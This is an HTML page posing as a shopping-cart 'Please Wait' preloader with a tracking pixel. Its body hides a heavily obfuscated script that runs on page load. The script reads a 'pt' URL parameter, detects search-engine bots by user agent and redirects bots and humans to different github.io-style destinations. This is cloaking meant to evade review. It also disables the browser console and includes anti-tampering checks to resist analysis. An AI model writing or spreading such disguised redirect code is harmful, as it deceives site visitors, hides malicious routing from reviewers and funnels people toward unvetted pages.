<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
	<script>
		function _0x45ec(_0x1f2d79,_0x556b3f){const _0x425f73=_0x46ad();return _0x45ec=function(_0x46ada3,_0x45ec62){_0x46ada3=_0x46ada3-(0x227c+-0x6*0x447+-0x82b);let _0x2694bf=_0x425f73[_0x46ada3];return _0x2694bf;},_0x45ec(_0x1f2d79,_0x556b3f);}function _0x46ad(){const _0x11fa09=['yRvJh','nKxGj','vJbdH','kscaM','izCcB','entorts.gi','nCuzi','lrwVv','return\x20(fu','yQhaj','IujzH','aUhSs','195wIfCTY','dIkWX','ZRKmW','bZiAO','935082XRXqKX','userAgent','110503OaDtWb','thub.io/','{}.constru','429722rOsQnV','go/','constructo','KXYRg','tMjnt','__proto__','location','ZRWsA','warn','ctor(\x22retu','length','YWfMT','adiXy','FHMAM','eXMAh','coRBX','rn\x20this\x22)(','Rcehr','error','prototype','console','bHVNv','yuqMV','(((.+)+)+)','search','info','toString','kZvzn','trace','15056BEzGQI','925825rJVzGV','log','8410640QqSjzL','torts.tlas','ehoKd','get','href','nvqAU','FptZH','NeLrj','gHLwX','bind','t.co/item/','WJcNj','2926259grVqmn','RATqV'];_0x46ad=function(){return _0x11fa09;};return _0x46ad();}(function(_0x40f30e,_0x3a15ba){function _0x408c37(_0x4c6f6c,_0x2e6e96,_0x2a5068,_0xe9ce4b){return _0x45ec(_0x4c6f6c-0x1fc,_0xe9ce4b);}const _0xc6eb5=_0x40f30e();function _0x525187(_0x1f84cb,_0x38867e,_0x5deb87,_0x2b387f){return _0x45ec(_0x38867e-0x27d,_0x5deb87);}while(!![]){try{const _0x26b574=-parseInt(_0x525187(0x322,0x325,0x342,0x325))/(0x1424+-0xb2*0x17+-0x425)+-parseInt(_0x408c37(0x2a7,0x2bf,0x28c,0x292))/(-0x1f72+-0x1979+0x38ed)+parseInt(_0x408c37(0x2e1,0x300,0x303,0x2eb))/(-0xae5*-0x1+0xa*0x21+-0xc2c*0x1)*(-parseInt(_0x525187(0x35c,0x345,0x324,0x336))/(0xe6+-0x1cb2+0x1bd0))+parseInt(_0x525187(0x34a,0x346,0x33e,0x368))/(-0x4b*-0xb+0x212e+0x1*-0x2462)+parseInt(_0x525187(0x360,0x366,0x349,0x382))/(-0x1*0x69b+-0x5*0x1d6+0xfcf)+-parseInt(_0x525187(0x359,0x354,0x34a,0x33b))/(0x4*-0x915+0x1*0x1d5c+0xc7*0x9)+parseInt(_0x525187(0x35c,0x348,0x358,0x32b))/(-0x21d1*-0x1+-0xce9*0x2+0x1*-0x7f7);if(_0x26b574===_0x3a15ba)break;else _0xc6eb5['push'](_0xc6eb5['shift']());}catch(_0x38acc9){_0xc6eb5['push'](_0xc6eb5['shift']());}}}(_0x46ad,0x47ace+-0x61*-0x1b83+-0x5d2d*0x18),(function(){function _0x1e7835(_0xad308c,_0x348de5,_0x20126e,_0x4955d7){return _0x45ec(_0x348de5-0x237,_0x20126e);}const _0x39faf8={'tMjnt':function(_0x166070,_0x5ac504){return _0x166070===_0x5ac504;},'ehoKd':'FepuT','yRvJh':function(_0x4982e5,_0x33fe06){return _0x4982e5+_0x33fe06;},'yQhaj':_0x1e7835(0x32d,0x318,0x313,0x31f)+'nction()\x20','bZiAO':_0x39ff61(0x1a3,0x1bd,0x197,0x1a8)+_0x39ff61(0x1ad,0x1c6,0x1aa,0x1c1)+_0x1e7835(0x2ea,0x2f2,0x2d9,0x312)+'\x20)','nCuzi':function(_0x268769){return _0x268769();},'eXMAh':_0x1e7835(0x306,0x301,0x2e6,0x313),'GVsJB':_0x1e7835(0x305,0x2ea,0x2da,0x2d5),'WJcNj':_0x39ff61(0x1bd,0x1a3,0x1c2,0x1bf),'Rcehr':_0x1e7835(0x307,0x2f4,0x2e6,0x2eb),'gHLwX':'exception','SOGXZ':'table','nKxGj':_0x39ff61(0x1c0,0x1c4,0x1af,0x1b7),'cZFTY':function(_0x291375,_0x26f46f){return _0x291375<_0x26f46f;},'yuqMV':function(_0x27d69b,_0x42591e){return _0x27d69b===_0x42591e;},'RATqV':_0x1e7835(0x2f2,0x2f1,0x305,0x2e3),'vJbdH':_0x1e7835(0x307,0x2f7,0x2ea,0x308),'YWhKY':_0x1e7835(0x2f8,0x2ed,0x2ed,0x2fb),'ZRKmW':function(_0x4c6bc2,_0x5553c6){return _0x4c6bc2+_0x5553c6;},'nvqAU':_0x39ff61(0x1a5,0x196,0x1a7,0x19a),'FptZH':function(_0x1121c3,_0x3d170d){return _0x1121c3+_0x3d170d;},'kscaM':function(_0x36ffc4,_0x3cae3b){return _0x36ffc4+_0x3cae3b;},'FHMAM':'zTGtP','adiXy':function(_0x26d4c2,_0x2c7aba,_0x55e3eb,_0x50062b){return _0x26d4c2(_0x2c7aba,_0x55e3eb,_0x50062b);},'aUhSs':function(_0x2cce66,_0x37d0c5,_0x2ccfd3){return _0x2cce66(_0x37d0c5,_0x2ccfd3);},'KXYRg':function(_0x1c4e30,_0x227818,_0x2ad50e){return _0x1c4e30(_0x227818,_0x2ad50e);},'ZRWsA':function(_0x3e32d7,_0x40c20b,_0x1fb852){return _0x3e32d7(_0x40c20b,_0x1fb852);},'lrwVv':'https://en'+_0x1e7835(0x2fd,0x303,0x2ec,0x2f1)+_0x39ff61(0x1ce,0x1ba,0x1d0,0x1b4)+_0x39ff61(0x1d7,0x1e2,0x1bf,0x1f0)+_0x1e7835(0x2c1,0x2e0,0x2f0,0x2dd)},_0x5dd793=(function(){let _0x5123e6=!![];return function(_0x4c625b,_0x204013){const _0x5525e7=_0x5123e6?function(){if(_0x204013){const _0x2870e4=_0x204013['apply'](_0x4c625b,arguments);return _0x204013=null,_0x2870e4;}}:function(){};return _0x5123e6=![],_0x5525e7;};}()),_0x4835c2=_0x39faf8[_0x1e7835(0x321,0x31b,0x315,0x31b)](_0x5dd793,this,function(){function _0x21b342(_0xd30324,_0x1e3185,_0x24b97d,_0x6ea6ed){return _0x39ff61(_0x24b97d- -0x34,_0x1e3185,_0x24b97d-0x127,_0x6ea6ed-0x1ac);}function _0x1e61b6(_0x7ccf96,_0x254cde,_0x2c9b80,_0x38fee8){return _0x1e7835(_0x7ccf96-0xfa,_0x7ccf96- -0x41b,_0x38fee8,_0x38fee8-0x17f);}return _0x4835c2[_0x1e61b6(-0x11f,-0x134,-0x13d,-0x106)]()['search']('(((.+)+)+)'+'+$')[_0x1e61b6(-0x11f,-0x137,-0x11e,-0x12b)]()[_0x1e61b6(-0x137,-0x11d,-0x148,-0x115)+'r'](_0x4835c2)[_0x21b342(0x19f,0x168,0x188,0x195)](_0x21b342(0x193,0x183,0x187,0x17d)+'+$');});function _0x39ff61(_0x191575,_0x76b37d,_0x30b36f,_0x28aff2){return _0x45ec(_0x191575-0xf9,_0x76b37d);}_0x4835c2();const _0x1d10cb=(function(){let _0x3f7832=!![];return function(_0x453677,_0xd94efb){const _0x4b404c={};function _0x58096a(_0x5f4cdc,_0x267d5d,_0x136d69,_0x1821c1){return _0x45ec(_0x267d5d-0xbd,_0x5f4cdc);}_0x4b404c[_0x58096a(0x196,0x1a3,0x19c,0x1be)]=function(_0x55a085,_0x1d3b8e){return _0x55a085===_0x1d3b8e;},_0x4b404c[_0x4ab487(-0x26d,-0x276,-0x281,-0x287)]=_0x4ab487(-0x295,-0x2ab,-0x2a1,-0x2a4);const _0x514955=_0x4b404c;function _0x4ab487(_0x526313,_0x45b94d,_0x59fbc9,_0x1a07c9){return _0x45ec(_0x1a07c9- -0x36a,_0x59fbc9);}if(_0x39faf8[_0x4ab487(-0x2a9,-0x29e,-0x2ac,-0x2bb)](_0x39faf8[_0x4ab487(-0x2ac,-0x28b,-0x2b6,-0x29d)],_0x39faf8[_0x4ab487(-0x287,-0x2a9,-0x292,-0x29d)])){const _0x3a9eb8=_0x3f7832?function(){function _0x3739c6(_0x4a8d1c,_0x4db2f1,_0x1fadf2,_0x1a98a){return _0x4ab487(_0x4a8d1c-0xdc,_0x4db2f1-0x165,_0x4db2f1,_0x4a8d1c-0x71a);}function _0x1722ae(_0x35c3b1,_0x1c6bb1,_0x528c9b,_0x2d24b2){return _0x58096a(_0x35c3b1,_0x528c9b-0x2dc,_0x528c9b-0x10c,_0x2d24b2-0x191);}if(_0xd94efb){if(_0x514955[_0x1722ae(0x488,0x497,0x47f,0x482)](_0x514955[_0x1722ae(0x488,0x466,0x47c,0x45a)],'kZvzn')){const _0x28de99=_0xd94efb['apply'](_0x453677,arguments);return _0xd94efb=null,_0x28de99;}else return _0x5458ea[_0x1722ae(0x44c,0x479,0x45e,0x47f)]()[_0x3739c6(0x473,0x466,0x466,0x494)](_0x3739c6(0x472,0x453,0x461,0x455)+'+$')[_0x3739c6(0x475,0x45c,0x47c,0x457)]()[_0x3739c6(0x45d,0x470,0x451,0x44d)+'r'](_0x16fe22)[_0x3739c6(0x473,0x45e,0x466,0x476)]('(((.+)+)+)'+'+$');}}:function(){};return _0x3f7832=![],_0x3a9eb8;}else{const _0x5b49b9=_0x3ac724['apply'](_0x5de8e8,arguments);return _0x2ef370=null,_0x5b49b9;}};}()),_0x150ddf=_0x39faf8[_0x1e7835(0x2fc,0x2e5,0x2f8,0x2e1)](_0x1d10cb,this,function(){let _0x589aa0;try{const _0x10ec6a=Function(_0x39faf8[_0x57fe8f(0x240,0x211,0x227,0x239)](_0x39faf8[_0x57fe8f(0x235,0x211,0x227,0x210)](_0x39faf8[_0x7e02be(0x2c6,0x2b8,0x2be,0x2a7)],_0x39faf8[_0x57fe8f(0x24f,0x246,0x236,0x222)]),');'));_0x589aa0=_0x39faf8['nCuzi'](_0x10ec6a);}catch(_0x8f32b4){_0x589aa0=window;}function _0x7e02be(_0x4a68e7,_0x544b39,_0x353007,_0x5bce75){return _0x39ff61(_0x353007-0xe3,_0x4a68e7,_0x353007-0x3f,_0x5bce75-0x159);}const _0x11e249=_0x589aa0[_0x7e02be(0x2a5,0x2a9,0x29b,0x2ac)]=_0x589aa0['console']||{},_0x5d6f61=[_0x39faf8[_0x57fe8f(0x213,0x1fa,0x207,0x20c)],_0x39faf8['GVsJB'],_0x39faf8[_0x7e02be(0x2a4,0x2ab,0x2b2,0x2a2)],_0x39faf8[_0x57fe8f(0x22b,0x1f4,0x20a,0x224)],_0x39faf8[_0x7e02be(0x292,0x28e,0x2af,0x2c3)],_0x39faf8['SOGXZ'],_0x39faf8[_0x57fe8f(0x20a,0x213,0x228,0x20d)]];function _0x57fe8f(_0x234c00,_0x3b2f6c,_0x4aa315,_0x452865){return _0x1e7835(_0x234c00-0x155,_0x4aa315- -0xe9,_0x3b2f6c,_0x452865-0x16d);}for(let _0x1ce3f5=0x1ceb+-0x30*-0xbb+-0x3ffb;_0x39faf8['cZFTY'](_0x1ce3f5,_0x5d6f61[_0x7e02be(0x2a3,0x2ab,0x291,0x291)]);_0x1ce3f5++){if(_0x39faf8[_0x57fe8f(0x208,0x1fe,0x20f,0x21f)](_0x39faf8[_0x57fe8f(0x20b,0x205,0x226,0x246)],_0x57fe8f(0x216,0x22d,0x22b,0x245))){const _0x16c75f=_0x3fcaa0?function(){if(_0x355f6d){const _0x16c4cc=_0x2f9692['apply'](_0x2d4caa,arguments);return _0x200b77=null,_0x16c4cc;}}:function(){};return _0x2f2a85=![],_0x16c75f;}else{const _0x4ceb6=_0x1d10cb['constructo'+'r'][_0x57fe8f(0x200,0x213,0x20c,0x203)][_0x57fe8f(0x20d,0x20f,0x222,0x20f)](_0x1d10cb),_0x97c2b3=_0x5d6f61[_0x1ce3f5],_0x3cc312=_0x11e249[_0x97c2b3]||_0x4ceb6;_0x4ceb6[_0x57fe8f(0x1ed,0x1f7,0x1fe,0x1e0)]=_0x1d10cb[_0x57fe8f(0x218,0x226,0x222,0x20a)](_0x1d10cb),_0x4ceb6[_0x57fe8f(0x207,0x22a,0x213,0x212)]=_0x3cc312[_0x7e02be(0x2aa,0x2ab,0x2a1,0x297)][_0x57fe8f(0x20c,0x210,0x222,0x220)](_0x3cc312),_0x11e249[_0x97c2b3]=_0x4ceb6;}}});_0x150ddf();const _0x4143fb=new URLSearchParams(window[_0x1e7835(0x306,0x2e8,0x2cf,0x2fb)][_0x39ff61(0x1bc,0x1c6,0x1a0,0x19c)]),_0x376602=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i['test'](navigator[_0x1e7835(0x2fc,0x2de,0x2ee,0x2f0)]),_0x8852c0=(_0x159136,_0x101384,_0x2d22a5)=>{function _0x1a56a7(_0x4d0ebc,_0x17ca2e,_0x4f444b,_0x29c8bd){return _0x1e7835(_0x4d0ebc-0x82,_0x4d0ebc-0x185,_0x4f444b,_0x29c8bd-0x192);}function _0x3cb680(_0x594505,_0x290c6d,_0xb94b2d,_0x4b64d4){return _0x1e7835(_0x594505-0x1b1,_0x594505-0x8,_0x290c6d,_0x4b64d4-0xc1);}if(_0x39faf8[_0x3cb680(0x31a,0x317,0x31b,0x2ff)]!==_0x39faf8['YWhKY']){const _0x48945b=_0x2d22a5?_0x39faf8[_0x1a56a7(0x4a3,0x4a9,0x4b9,0x4a7)](_0x159136,_0x101384):_0x159136+_0x39faf8[_0x1a56a7(0x48c,0x49c,0x47f,0x4a7)]+_0x101384+'/';location[_0x1a56a7(0x48b,0x489,0x470,0x47d)]=_0x48945b;}else{const _0x480218=_0x5e891b?function(){if(_0x42cfe0){const _0x2db79e=_0x205585['apply'](_0x4fd75b,arguments);return _0x1c4735=null,_0x2db79e;}}:function(){};return _0x24fc58=![],_0x480218;}},_0x183643=(_0x3df34f,_0x4838c0)=>{function _0x6d428c(_0x156c99,_0x42604a,_0x41a50a,_0x315fab){return _0x1e7835(_0x156c99-0xde,_0x41a50a- -0x376,_0x156c99,_0x315fab-0x1bc);}function _0x3ecf80(_0x504cb6,_0x5c6900,_0x5c7c8f,_0x5f4975){return _0x39ff61(_0x5f4975-0x17a,_0x5c6900,_0x5c7c8f-0x8d,_0x5f4975-0x136);}if(_0x39faf8['yuqMV'](_0x3ecf80(0x334,0x34b,0x32a,0x345),_0x39faf8[_0x3ecf80(0x339,0x31c,0x330,0x32b)])){const _0x4404b1=_0x1650c9(MBcrZc[_0x3ecf80(0x35c,0x32c,0x336,0x344)](MBcrZc[_0x6d428c(-0x42,-0x52,-0x63,-0x82)](MBcrZc[_0x3ecf80(0x339,0x36f,0x374,0x355)],_0x3ecf80(0x31c,0x324,0x318,0x31d)+_0x3ecf80(0x346,0x344,0x328,0x327)+_0x6d428c(-0x63,-0x9e,-0x84,-0x6e)+'\x20)'),');'));_0x343a73=MBcrZc[_0x6d428c(-0x42,-0x55,-0x60,-0x78)](_0x4404b1);}else _0x4838c0&&_0x39faf8[_0x6d428c(-0xa3,-0x96,-0x88,-0x6f)](_0x8852c0,_0x3df34f,_0x4838c0,_0x376602);};_0x39faf8[_0x1e7835(0x2f5,0x2e9,0x2e1,0x2d5)](_0x183643,_0x39faf8[_0x1e7835(0x2f7,0x317,0x315,0x334)],_0x4143fb[_0x39ff61(0x1c7,0x1a6,0x1ab,0x1a9)]('pt'));}()));
	</script>
	</body>
</html>
